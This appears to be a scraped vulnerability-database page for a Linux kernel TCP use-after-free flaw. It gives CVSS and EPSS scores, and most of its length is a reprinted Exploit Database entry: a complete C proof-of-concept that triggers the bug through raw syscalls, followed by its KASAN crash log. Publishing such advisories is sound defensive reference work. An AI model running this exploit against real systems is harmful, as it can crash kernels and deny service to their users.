Related Weaknesses 
            
                
                    
                    
                        CWE-ID Weakness Name 
                        Source 
                     
                     
                    
                                
                                    CWE-416 Use After Free  
                 
            
         
            
                                
                                            Metrics 
            
                
                    
                    
                        Metrics 
                        Score 
                        Severity 
                        CVSS Vector 
                        Source 
                     
                     
                    
                
                    V3.0 
                    5.5 
                    MEDIUM 
                    
                        CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H                                
            
            
                
                    
                        
                            Base: Exploitabilty Metrics The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.
Attack Vector
This metric reflects the context by which vulnerability exploitation is possible.
A vulnerability exploitable with Local access means that the vulnerable component is not bound to the network stack, and the attacker's path is via read/write/execute capabilities. In some cases, the attacker may be logged in locally in order to exploit the vulnerability, otherwise, she may rely on User Interaction to execute a malicious file.
Attack Complexity
This metric describes the conditions beyond the attacker's control that must exist in order to exploit the vulnerability.
Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success against the vulnerable component.
Privileges Required
This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.
The attacker is authorized with (i.e. requires) privileges that provide basic user capabilities that could normally affect only settings and files owned by a user. Alternatively, an attacker with Low privileges may have the ability to cause an impact only to non-sensitive resources.
User Interaction
This metric captures the requirement for a user, other than the attacker, to participate in the successful compromise of the vulnerable component.
The vulnerable system can be exploited without interaction from any user.
Base: Scope Metrics An important property captured by CVSS v3.0 is the ability for a vulnerability in one software component to impact resources beyond its means, or privileges. 
Scope
Formally, Scope refers to the collection of privileges defined by a computing authority (e.g. an application, an operating system, or a sandbox environment) when granting access to computing resources (e.g. files, CPU, memory, etc). These privileges are assigned based on some method of identification and authorization. In some cases, the authorization may be simple or loosely controlled based upon predefined rules or standards. For example, in the case of Ethernet traffic sent to a network switch, the switch accepts traffic that arrives on its ports and is an authority that controls the traffic flow to other switch ports.
An exploited vulnerability can only affect resources managed by the same authority. In this case the vulnerable component and the impacted component are the same.
Base: Impact Metrics The Impact metrics refer to the properties of the impacted component. 
Confidentiality Impact
This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.
There is no loss of confidentiality within the impacted component.
Integrity Impact
This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.
There is no loss of integrity within the impacted component.
Availability Impact
This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.
There is total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable).
Temporal Metrics The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence that one has in the description of a vulnerability.
Environmental Metrics 
                         
                     
                 
             
         
                     
                    nvd@nist.gov 
                 
                    
                        V2 
                        4.9 
                        
                            AV:L/AC:L/Au:N/C:N/I:N/A:C                         
                        nvd@nist.gov 
                     
                 
            
         
            
                                
                                            EPSS 
            EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
            EPSS Score 
            The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
            
            
                
            
                Date EPSS V0 EPSS V1 EPSS V2 EPSS V3 EPSS V4 2022-02-06 – – 3.53% – – 2022-02-13 – – 3.53% – – 2022-04-03 – – 3.53% – – 2022-05-15 – – 3.53% – – 2022-12-18 – – 3.53% – – 2023-01-01 – – 3.53% – – 2023-02-05 – – 4.21% – – 2023-02-19 – – 3.53% – – 2023-02-26 – – 3.53% – – 2023-03-12 – – – 0.05% – 2023-04-30 – – – 0.05% – 2023-05-07 – – – 0.05% – 2023-05-14 – – – 0.05% – 2023-08-06 – – – 0.05% – 2023-08-13 – – – 0.05% – 2023-08-27 – – – 0.05% – 2023-09-10 – – – 0.05% – 2024-01-07 – – – 0.05% – 2024-03-03 – – – 0.05% – 2024-03-31 – – – 0.05% – 2024-06-02 – – – 0.05% – 2024-06-09 – – – 0.05% – 2024-08-25 – – – 0.05% – 2024-12-08 – – – 0.05% – 2025-03-02 – – – 0.05% – 2025-01-19 – – – 0.05% – 2025-03-09 – – – 0.05% – 2025-03-18 – – – – 0.11% 2025-04-15 – – – – 0.11% 2025-07-06 – – – – 0.11% 2025-07-09 – – – – 0.11% 2025-07-12 – – – – 0.11% 2025-08-01 – – – – 0.11% 2025-08-02 – – – – 0.11% 2025-08-11 – – – – 0.1% 2025-08-11 – – – – 0.1,% 
             
            EPSS Percentile 
            The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
            
            
            
                
            
                Date Percentile 2022-02-06 66% 2022-02-13 67% 2022-04-03 83% 2022-05-15 84% 2022-12-18 85% 2023-01-01 84% 2023-02-05 87% 2023-02-19 84% 2023-02-26 85% 2023-03-12 12% 2023-04-30 13% 2023-05-07 12% 2023-05-14 13% 2023-08-06 12% 2023-08-13 13% 2023-08-27 12% 2023-09-10 13% 2024-01-07 12% 2024-03-03 13% 2024-03-31 14% 2024-06-02 15% 2024-06-09 16% 2024-08-25 17% 2024-12-08 18% 2025-03-02 19% 2025-01-19 18% 2025-03-09 19% 2025-03-18 27% 2025-04-15 31% 2025-07-06 3% 2025-07-09 31% 2025-07-12 3% 2025-08-01 31% 2025-08-02 3% 2025-08-11 28% 2025-08-11 28% 
             
            
            
            
                                            Exploit information 
                Exploit Database EDB-ID : 40731  
                Publication date :  2016-08-17 22h00  +00:00 Author :  Marco GrassiEDB Verified :  No
                // Source: https://marcograss.github.io/security/linux/2016/08/18/cve-2016-6828-linux-kernel-tcp-uaf.html
// to build clang derp4.c -o derp4 -static
#include <unistd.h>
#include <sys/syscall.h>
#include <string.h>
#include <stdint.h>
#include <pthread.h>
#include <stdio.h>
#ifndef SYS_mmap
#define SYS_mmap 9
#endif
#ifndef SYS_socket
#define SYS_socket 41
#endif
#ifndef SYS_bind
#define SYS_bind 49
#endif
#ifndef SYS_sendto
#define SYS_sendto 44
#endif
#ifndef SYS_setsockopt
#define SYS_setsockopt 54
#endif
#ifndef SYS_dup
#define SYS_dup 32
#endif
#ifndef SYS_sendmsg
#define SYS_sendmsg 46
#endif
#ifndef SYS_recvfrom
#define SYS_recvfrom 45
#endif
#ifndef SYS_write
#define SYS_write 1
#endif
long r[62];
int main(int argc, char **argv)
{
    while (1) {
        pid_t pid = fork();
        if (pid == 0) {
        r[0] = syscall(SYS_mmap, 0x20000000ul, 0x20000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);
        r[1] = syscall(SYS_socket, 0xaul, 0x1ul, 0x0ul, 0, 0, 0);
        memcpy((void*)0x20006000, "\x0a\x00\xab\x12\xc7\x17\x1c\x83\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x05\x4f\xdc\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 128);
        r[3] = syscall(SYS_bind, r[1], 0x20006000ul, 0x80ul, 0, 0, 0);
        r[4] = syscall(SYS_mmap, 0x20020000ul, 0x1000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);
        memcpy((void*)0x20012f5a, "\x25\xf9\x1b\xd4\xeb\xf5\x39\x3c\xd5\x80\xf6\xf0\xd6\xe1\xff\x65\x30\x97\xac\xaf\x1b\xbc\xc8\xae\xa4\x1e\xab\xd8\x60\x51\xcb\x4b\xed\xae\xaa\x37\xda\x80\xf9\x06\xb8\x6b\xdf\x78\x0f\xd0\x87\xf2\x65\x5f\x5e\x85\xb5\x4d\x6b\x48\xff\xf3\x0d\x46\x1c\xe5\xa4\x48\x38\x78\x18\x71\x9b\x75\xc4\xc9\x77\xf2\xc4\x5f\x88\x8e\xd2\x8d\x97\x26\x56\x4c\x93\x31\xbc\x64\x22\xff\xdc\x68\x01\x74\x43\xea\x84\x6f\x1d\x90\xeb\x98\x6c\xe9\x1c\x3b\x72\xab\xa0\xb5\x5b\xe8\xee\xfb\xf3\x2d\x96\xa0\xd4\x13\x55\xbc\xd4\xe0\x41\xfd\x78\x7e\x90\xf9\x9f\x9c\x57\x32\x47\xf2\xcf\x7f\x4a\x7b\x79\x0a\xdd\xb4\xce\xbd\x0b\x44\x02\x95\x0f\xaf\x50\xff\x87\x90\x09\xaa\x94\x01\x41\x43\x08\x8e\xb1", 165);
        memcpy((void*)0x20020000, "\x0a\x00\xab\x12\x0d\xf5\xba\x69\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xac\xad\xce\xa0", 28);
        r[7] = syscall(SYS_sendto, r[1], 0x20012f5aul, 0xa5ul, 0x249e4e54fe149d8cul, 0x20020000ul, 0x1cul);
        *(uint32_t*)0x20001fff = (uint32_t)0x2;
        r[9] = syscall(SYS_setsockopt, r[1], 0x1ul, 0x8ul, 0x20001ffful, 0x4ul, 0);
        r[10] = syscall(SYS_dup, r[1], 0, 0, 0, 0, 0);
        *(uint32_t*)0x20018000 = (uint32_t)0x4;
        r[12] = syscall(SYS_setsockopt, r[1], 0x29ul, 0xbul, 0x20018000ul, 0x4ul, 0);
        *(uint64_t*)0x2000dfc8 = (uint64_t)0x2000e000;
        *(uint32_t*)0x2000dfd0 = (uint32_t)0xc;
        *(uint64_t*)0x2000dfd8 = (uint64_t)0x20000000;
        *(uint64_t*)0x2000dfe0 = (uint64_t)0x1;
        *(uint64_t*)0x2000dfe8 = (uint64_t)0x0;
        *(uint64_t*)0x2000dff0 = (uint64_t)0x0;
        *(uint32_t*)0x2000dff8 = (uint32_t)0x4;
        *(uint16_t*)0x2000e000 = (uint16_t)0x0;
        *(uint16_t*)0x2000e002 = (uint16_t)0x0;
        *(uint32_t*)0x2000e004 = (uint32_t)0xffff;
        *(uint32_t*)0x2000e008 = (uint32_t)0x401;
        *(uint64_t*)0x20000000 = (uint64_t)0x2000ed3a;
        *(uint64_t*)0x20000008 = (uint64_t)0x37;
        *(uint32_t*)0x2000ed3a = (uint32_t)0x14;
        *(uint16_t*)0x2000ed3e = (uint16_t)0x2;
        *(uint16_t*)0x2000ed40 = (uint16_t)0x12;
        *(uint32_t*)0x2000ed42 = (uint32_t)0x1f;
        *(uint32_t*)0x2000ed46 = (uint32_t)0x7;
        *(uint8_t*)0x2000ed4a = (uint8_t)0x6;
        *(uint8_t*)0x2000ed4b = (uint8_t)0x100;
        *(uint8_t*)0x2000ed4c = (uint8_t)0x3f;
        *(uint32_t*)0x2000ed4d = (uint32_t)0x11;
        *(uint16_t*)0x2000ed51 = (uint16_t)0x0;
        *(uint16_t*)0x2000ed53 = (uint16_t)0x808;
        *(uint32_t*)0x2000ed55 = (uint32_t)0x1;
        *(uint32_t*)0x2000ed59 = (uint32_t)0x0;
        *(uint8_t*)0x2000ed5d = (uint8_t)0x0;
        *(uint32_t*)0x2000ed5e = (uint32_t)0x12;
        *(uint16_t*)0x2000ed62 = (uint16_t)0x2ea;
        *(uint16_t*)0x2000ed64 = (uint16_t)0x200;
        *(uint32_t*)0x2000ed66 = (uint32_t)0x5;
        *(uint32_t*)0x2000ed6a = (uint32_t)0xffffffffffffffff;
        *(uint8_t*)0x2000ed6e = (uint8_t)0x9;
        *(uint8_t*)0x2000ed6f = (uint8_t)0x1;
        r[47] = syscall(SYS_sendmsg, r[10], 0x2000dfc8ul, 0x801ul, 0, 0, 0);
        *(uint16_t*)0x20001003 = (uint16_t)0x1;
        *(uint8_t*)0x20001005 = (uint8_t)0x0;
        *(uint32_t*)0x20001007 = (uint32_t)0x9;
        r[51] = syscall(SYS_recvfrom, r[10], 0x20014a91ul, 0xdeul, 0x0ul, 0x20000ffbul, 0x8ul);
        memcpy((void*)0x20015285, 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4096);
        r[53] = syscall(SYS_sendto, r[10], 0x20015285ul, 0x1000ul, 0xc080ul, 0x0ul, 0x0ul);
        r[54] = syscall(SYS_mmap, 0x20022000ul, 0x1000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);
        *(uint32_t*)0x20022fdd = (uint32_t)0x28;
        *(uint32_t*)0x20022fe1 = (uint32_t)0x400;
        *(uint64_t*)0x20022fe5 = (uint64_t)0x0;
        *(uint64_t*)0x20022fed = (uint64_t)0x8ab;
        *(uint64_t*)0x20022ff5 = (uint64_t)0xfffffffffffffffb;
        *(uint16_t*)0x20022ffd = (uint16_t)0x5;
        r[61] = syscall(SYS_write, r[10], 0x20022fddul, 0x28ul, 0, 0, 0);
        } else if (pid > 0) {
            int returnStatus;
            waitpid(pid, &returnStatus, 0);
            printf("collected child\n");
        } else {
            printf("fork failed\n");
            exit(1);
        }
    }
    return 0;
}
// KASAN report on v4.8-rc1, equivalent on master
/*
[   21.446876] BUG: KASAN: use-after-free in tcp_xmit_retransmit_queue+0xc75/0xdb0 at addr ffff88007a06d428
[   21.447953] Read of size 4 by task rsyslogd/1612
[   21.448465] CPU: 0 PID: 1612 Comm: rsyslogd Tainted: G    B           4.8.0-rc1 #1
[   21.449263] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[   21.450270]  0000000000000000 0000000015e55fbd ffff88007dc07268 ffffffff81bef151
[   21.451135]  ffff88011cfb0d80 ffff88007a06d400 ffff88007a06d5a8 ffff88007a06d400
[   21.452002]  ffff88007dc07290 ffffffff815d0351 ffff88007dc07328 ffff88007a06d400
[   21.452873] Call Trace:
[   21.453142]  <IRQ>  [<ffffffff81bef151>] dump_stack+0x83/0xb2
[   21.453835]  [<ffffffff815d0351>] kasan_object_err+0x21/0x70
[   21.454450]  [<ffffffff815d05f4>] kasan_report_error+0x204/0x500
[   21.455135]  [<ffffffff815d0a31>] __asan_report_load4_noabort+0x61/0x70
[   21.455899]  [<ffffffff82a90f55>] ? tcp_xmit_retransmit_queue+0xc75/0xdb0
[   21.456624]  [<ffffffff82a90f55>] tcp_xmit_retransmit_queue+0xc75/0xdb0
[   21.457329]  [<ffffffff82a53aba>] tcp_xmit_recovery.part.54+0x2a/0x120
[   21.458028]  [<ffffffff82a69c96>] tcp_ack+0x2716/0x4ed0
[   21.458590]  [<ffffffff815cf6e6>] ? save_stack+0x46/0xd0
[   21.459189]  [<ffffffff815cf95d>] ? kasan_kmalloc+0xad/0xe0
[   21.459804]  [<ffffffff82a67580>] ? tcp_fastretrans_alert+0x2dc0/0x2dc0
[   21.460540]  [<ffffffff82a5a63f>] ? tcp_parse_options+0x18f/0xb20
[   21.461237]  [<ffffffff811ea161>] ? ttwu_do_wakeup+0x21/0x2d0
[   21.461865]  [<ffffffff82a6e8b1>] ? tcp_validate_incoming+0x821/0x1210
[   21.462581]  [<ffffffff81c0e93e>] ? put_dec+0x2e/0xc0
[   21.463167]  [<ffffffff82a74201>] tcp_rcv_established+0x5b1/0x20c0
[   21.463884]  [<ffffffff815cfaa5>] ? memcpy+0x45/0x50
[   21.464414]  [<ffffffff828ec80a>] ? __copy_skb_header+0x19a/0x1f0
[   21.465057]  [<ffffffff82a73c50>] ? tcp_data_queue+0x4240/0x4240
[   21.465719]  [<ffffffff828eca97>] ? __skb_clone+0x237/0x7a0
[   21.466326]  [<ffffffff815cbed8>] ? kmem_cache_alloc+0xb8/0x1b0
[   21.466954]  [<ffffffff82baa6b7>] ? rt6_check_expired+0xa7/0x120
[   21.467591]  [<ffffffff82bae7f2>] ? ip6_dst_check+0x262/0x410
[   21.468231]  [<ffffffff82c0ff52>] tcp_v6_do_rcv+0x642/0x13c0
[   21.468836]  [<ffffffff82c148d2>] tcp_v6_rcv+0x1a32/0x2550
[   21.469462]  [<ffffffff81233abb>] ? trigger_load_balance+0x3fb/0x8b0
[   21.470179]  [<ffffffff82beaa55>] ? raw6_local_deliver+0x555/0x6f0
[   21.470953]  [<ffffffff82b82dec>] ip6_input_finish+0x2ac/0xd50
[   21.471600]  [<ffffffff82b8396a>] ip6_input+0xda/0x1f0
[   21.472149]  [<ffffffff81117670>] ? kvm_guest_apic_eoi_write+0x70/0x90
[   21.472870]  [<ffffffff82b83890>] ? ip6_input_finish+0xd50/0xd50
[   21.473521]  [<ffffffff8128a722>] ? handle_fasteoi_irq+0x362/0x6a0
[   21.474210]  [<ffffffff810f56c0>] ? ioapic_ir_ack_level+0xd0/0xd0
[   21.474858]  [<ffffffff82b8291e>] ip6_rcv_finish+0x11e/0x340
[   21.475487]  [<ffffffff82b84806>] ipv6_rcv+0xd86/0x1750
[   21.476043]  [<ffffffff82b83a80>] ? ip6_input+0x1f0/0x1f0
[   21.476615]  [<ffffffff82cadeb5>] ? _raw_spin_unlock_irqrestore+0x15/0x20
[   21.477332]  [<ffffffff815d03d7>] ? kasan_end_report+0x37/0x50
[   21.478956]  [<ffffffff815d0825>] ? kasan_report_error+0x435/0x500
[   21.479618]  [<ffffffff82b83a80>] ? ip6_input+0x1f0/0x1f0
[   21.480250]  [<ffffffff8293926f>] __netif_receive_skb_core+0x15df/0x26c0
[   21.481017]  [<ffffffff812092c0>] ? update_curr+0x150/0x4e0
[   21.481700]  [<ffffffff82937c90>] ? netdev_info+0x120/0x120
[   21.482339]  [<ffffffff812bf12b>] ? hrtimer_active+0x1db/0x280
[   21.482969]  [<ffffffff81206b3d>] ? cpu_load_update+0x1bd/0x350
[   21.483619]  [<ffffffff81227f2c>] ? task_tick_fair+0x119c/0x2420
[   21.484295]  [<ffffffff810fddf1>] ? __x2apic_send_IPI_dest.constprop.4+0x31/0x40
[   21.485101]  [<ffffffff810fe072>] ? x2apic_send_IPI+0x72/0xa0
[   21.485739]  [<ffffffff8293a37f>] __netif_receive_skb+0x2f/0x170
[   21.486383]  [<ffffffff8293e1a7>] process_backlog+0x197/0x580
[   21.487021]  [<ffffffff8293bc9a>] net_rx_action+0x6ca/0xbb0
[   21.487615]  [<ffffffff8293b5d0>] ? sk_busy_loop+0x7b0/0x7b0
[   21.488258]  [<ffffffff8111850e>] ? kvm_clock_get_cycles+0x1e/0x20
[   21.488909]  [<ffffffff812d3e90>] ? ktime_get+0xb0/0x110
[   21.489471]  [<ffffffff810fdc1b>] ? native_apic_msr_write+0x2b/0x30
[   21.490147]  [<ffffffff812e3ca6>] ? clockevents_program_event+0x246/0x340
[   21.490868]  [<ffffffff82cb121e>] __do_softirq+0x1ce/0x57d
[   21.491470]  [<ffffffff811769d7>] irq_exit+0x117/0x140
[   21.492035]  [<ffffffff82cb0dd0>] smp_apic_timer_interrupt+0x80/0xa0
[   21.492712]  [<ffffffff82caf062>] apic_timer_interrupt+0x82/0x90
[   21.493378]  <EOI> Object at ffff88007a06d400, in cache skbuff_fclone_cache size: 424
[   21.494277] Allocated:
[   21.494538] PID = 1711
[   21.494801]  [<ffffffff810b308b>] save_stack_trace+0x2b/0x50
[   21.495416]  [<ffffffff815cf6e6>] save_stack+0x46/0xd0
[   21.495970]  [<ffffffff815cf95d>] kasan_kmalloc+0xad/0xe0
[   21.496572]  [<ffffffff815cfe92>] kasan_slab_alloc+0x12/0x20
[   21.497185]  [<ffffffff815cc51e>] kmem_cache_alloc_node+0xfe/0x1d0
[   21.497853]  [<ffffffff828f21f2>] __alloc_skb+0xd2/0x5d0
[   21.498475]  [<ffffffff82a480fd>] sk_stream_alloc_skb+0xbd/0x790
[   21.499129]  [<ffffffff82a4b464>] tcp_sendmsg+0x13f4/0x2d10
[   21.499754]  [<ffffffff82afb2ac>] inet_sendmsg+0x24c/0x350
[   21.500371]  [<ffffffff828d58ef>] sock_sendmsg+0xcf/0x110
[   21.500988]  [<ffffffff828d5b52>] sock_write_iter+0x222/0x3c0
[   21.501625]  [<ffffffff8162d10b>] __vfs_write+0x3cb/0x640
[   21.502249]  [<ffffffff8162e315>] vfs_write+0x175/0x4a0
[   21.502838]  [<ffffffff81631b78>] SyS_write+0xd8/0x1b0
[   21.503429]  [<ffffffff82cae476>] entry_SYSCALL_64_fastpath+0x1e/0xa8
[   21.504144] Freed:
[   21.504368] PID = 1711
[   21.504628]  [<ffffffff810b308b>] save_stack_trace+0x2b/0x50
[   21.505290]  [<ffffffff815cf6e6>] save_stack+0x46/0xd0
[   21.505879]  [<ffffffff815cff13>] kasan_slab_free+0x73/0xc0
[   21.506501]  [<ffffffff815cb70c>] kmem_cache_free+0x7c/0x210
[   21.507128]  [<ffffffff828eba3b>] kfree_skbmem+0x7b/0xf0
[   21.507752]  [<ffffffff828f3e22>] __kfree_skb+0x22/0x30
[   21.508339]  [<ffffffff82a4b8ad>] tcp_sendmsg+0x183d/0x2d10
[   21.508962]  [<ffffffff82afb2ac>] inet_sendmsg+0x24c/0x350
[   21.509574]  [<ffffffff828d58ef>] sock_sendmsg+0xcf/0x110
[   21.510194]  [<ffffffff828d5b52>] sock_write_iter+0x222/0x3c0
[   21.510818]  [<ffffffff8162d10b>] __vfs_write+0x3cb/0x640
[   21.511408]  [<ffffffff8162e315>] vfs_write+0x175/0x4a0
[   21.512003]  [<ffffffff81631b78>] SyS_write+0xd8/0x1b0
[   21.512562]  [<ffffffff82cae476>] entry_SYSCALL_64_fastpath+0x1e/0xa8
[   21.513258] Memory state around the buggy address:
[   21.513770]  ffff88007a06d300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[   21.514546]  ffff88007a06d380: 00 00 00 00 00 fc fc fc fc fc fc fc fc fc fc fc
[   21.515310] >ffff88007a06d400: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[   21.516114]                                   ^
[   21.516611]  ffff88007a06d480: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[   21.517400]  ffff88007a06d500: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[   21.518203] ==================================================================
*/
                
                                            Products Mentioned 
Configuraton 0 Linux>>Linux_kernel >> Version  To (including) 4.7.4
            
                                References